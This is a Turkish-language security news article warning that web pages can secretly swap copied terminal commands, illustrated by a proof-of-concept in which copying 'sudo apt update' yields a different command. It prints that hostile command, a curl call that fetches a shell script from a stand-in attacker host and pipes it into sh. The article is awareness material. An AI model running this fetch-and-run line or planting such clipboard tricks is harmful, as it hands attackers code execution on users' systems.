Web Sayfalarından Komutları Kopyalayıp Yapıştırmayın, Saldırıya Uğrayabilirsiniz
Web sayfalarından komutları bir konsola veya terminale kopyalayıp yapıştıran programcılar, sistem yöneticileri, güvenlik araştırmacıları ve teknoloji meraklıları, sistemlerinin tehlikeye girme riskiyle karşı karşıya oldukları konusunda uyarılır.
Bir teknoloji uzmanı, web sayfalarından metin kopyalayıp yapıştırmadan önce iki kez düşünmenizi sağlayacak basit bir numara gösteriyor.
Panonuzdaki arka kapı mı?
Son zamanlarda, güvenlik bilinci eğitim platformu Wizer'ın kurucusu Gabriel Friedlander, web sayfalarından komutları kopyalayıp yapıştırma konusunda dikkatli olmanızı sağlayacak bariz ama şaşırtıcı bir hack gösterdi.
Acemi ve yetenekli geliştiriciler için yaygın olarak kullanılan komutları bir web sayfasından (ahem, StackOverflow) kopyalayıp uygulamalarına, bir Windows komut istemine veya bir Linux terminaline yapıştırmak alışılmadık bir durum değildir.
Ancak Friedlander, bir web sayfasının panonuzdaki içeriğin gizlice değiştirilebileceği ve aslında panonuza kopyalanan şeyin, kopyalamayı amaçladığınızdan çok farklı olacağı konusunda uyarıyor.
Daha da kötüsü, gerekli özen gösterilmeden, geliştirici ancak metni yapıştırdıktan sonra hatasını fark edebilir ve bu noktada çok geç olabilir.
Friedlander, blogunda yayınlanan basit bir kavram kanıtında (PoC) okuyuculardan çoğu sistem yöneticisinin ve geliştiricinin aşina olacağı basit bir komutu kopyalamalarını ister:
Şimdi, Friedlander'ın blogundan kopyaladığınız şeyi bir metin kutusuna veya Not Defteri'ne yapıştırın ve sonuç sizi şaşırtabilir:
curl http://attacker-domain:8000/shell.sh | sh
Panonuzda yalnızca tamamen farklı bir komut almakla kalmaz, aynı zamanda işleri daha da kötüleştirmek için sonunda bir yeni satır (veya dönüş) karakteri bulunur.
Bu, yukarıdaki örneğin doğrudan bir Linux terminaline yapıştırıldığı anda yürütüleceği anlamına gelir.
Metni yapıştıranlar, sisteminizde kurulu yazılımlarla ilgili güncel bilgileri almak için kullanılan tanıdık, zararsız sudo apt update komutunu kopyaladıkları izlenimine kapılmış olabilirler.
Ama tam olarak böyle olmadı.
Buna ne sebep olur?
Sihir, Friedlander tarafından PoC HTML sayfa kurulumunun arkasına gizlenmiş JavaScript kodundadır.
Bir HTML öğesinde bulunan "sudo apt update" metnini kopyaladığınız anda, aşağıda gösterilen kod parçacığı çalışır.
Ardından, copy olayını yakalayan ve pano verilerini Friedlander'ın kötü niyetli test koduyla değiştiren bir JavaScript ' olay dinleyicisi ' olur:
Olay dinleyicilerinin JavaScript'te çeşitli meşru kullanım durumları olduğunu unutmayın, ancak bu, bunların nasıl kötüye kullanılabileceğinin yalnızca bir örneğidir.
Friedlander, "Bu nedenle, yapıştır komutlarını ASLA doğrudan terminalinize kopyalamamalısınız" diye uyarıyor.
"Bir şeyi kopyaladığınızı düşünüyorsunuz, ancak bunun yerine kötü amaçlı kod gibi başka bir şey geliyor. Tek yapmanız gereken, uygulamanıza bir arka kapı oluşturmak için kopyaladığınız koda tek bir kod satırı eklemek."
"Bu saldırı çok basit ama aynı zamanda çok zararlı."
Bir Reddit kullanıcısı, JavaScript gerektirmeyen bu hilenin alternatif bir örneğini de sundu: Metnin görünür kısımlarını kopyaladığınızda panonuza kopyalanan HTML ve CSS stiliyle yapılmış görünmez metin:
SwallowYourDreams adlı kullanıcı, "Sorun yalnızca web sitesinin JavaScript kullanarak pano içeriğinizi değiştirebilmesi değildir," diye açıklıyor.
"Ayrıca HTML'de insan gözünün göremediği, ancak bilgisayar tarafından kopyalanacak komutları da gizleyebilir."
Bu nedenle, bir web sayfasından kopyaladığınız şeye asla körü körüne güvenmemek için başka bir neden daha - önce onu bir metin düzenleyiciye yapıştırın.
Günlük güvenlik konusunda basit ama yine de önemli bir ders.
Siber dünyadaki gelişmelerden haberdar olmak ve haftalık haber bültenine ulaşmak için e-posta listesine kaydolun.
Haber bültenine kaydolduğunuz için teşekkürler!
Something went wrong.
